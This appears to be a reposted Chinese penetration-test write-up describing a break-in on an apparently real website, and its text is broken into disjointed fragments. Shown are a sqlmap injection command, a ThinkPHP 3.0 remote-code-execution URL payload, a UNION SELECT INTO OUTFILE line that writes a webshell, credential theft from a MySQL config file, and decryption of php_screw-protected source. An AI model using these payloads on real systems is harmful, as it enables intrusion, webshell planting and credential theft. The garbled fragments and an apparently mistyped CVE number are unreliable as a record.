转载于:http://diego.team
对网站的渗透
mysql
,ftp
,ssh
,http
,ajp
,tomcat
多个服务2020-10487 Tomcat apj
WEB-INF/web.xml
里没有任何东西name
进行注入, 输入"||1||"
返回正常数据 ,但无法注释后面的内容,只能布尔注入
python .sqlmap.py -r res --tamper=space2comment --level 5 --dbs --random-agent
nginx
和 web目录
,默认路径不存在***/nginx/conf/nignx.conf
location /** {
autoindex on;
root /***/***/******;
index index.html index.htm index.php;
if (!-e $request_filename) {
rewrite ^/xx/(.*)$ /xxxx/admin.php/$1 last;
break;
}
}
location = /xxx {
#autoindex on;
root /xxx/xxx/xxxx;
index index.html index.htm index.php;
if (!-e $request_filename) {
rewrite ^/xx /xx/index.php last;
break;
}
}
mysql.inc.php
,读取获取了 mysql 的账号密码tp3.0
的远古框架 ,根据框架读了一下配置文件(也就是入可文件index.php)├─caches
│ ├─cache
│ ├─data
│ ├─logs
│ └─temp
├─common
├─Conf
├─language
├─library
│ ├─Action
│ ├─****
│ ├─Model
│ └─****
└─themes
tp3
的编程风格,确定 项目的文件为IndexAction.class.php
,通过sql注入读取发现乱码。。。tp3.0
的RCEhttp://**/index.php/Index/index/name/$%7B@phpinfo%28%29%7D
define('MODE_NAME','Lite');
0 union select tohex('webshell'),1,2 into outfile '/**/**/**/shell.php'
PM9SCREW
检索了一下 是screw
加密php_screw.so
文件IDA
_pm9screw_ext_fopen
加密函数key
(打码部分https://github.com/firebroo/screw_decode
进行解密screwdecode.c
make
./decode ./xx.php
原文始发于微信公众号(乌雲安全):实战|对某一网站的渗透测试
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论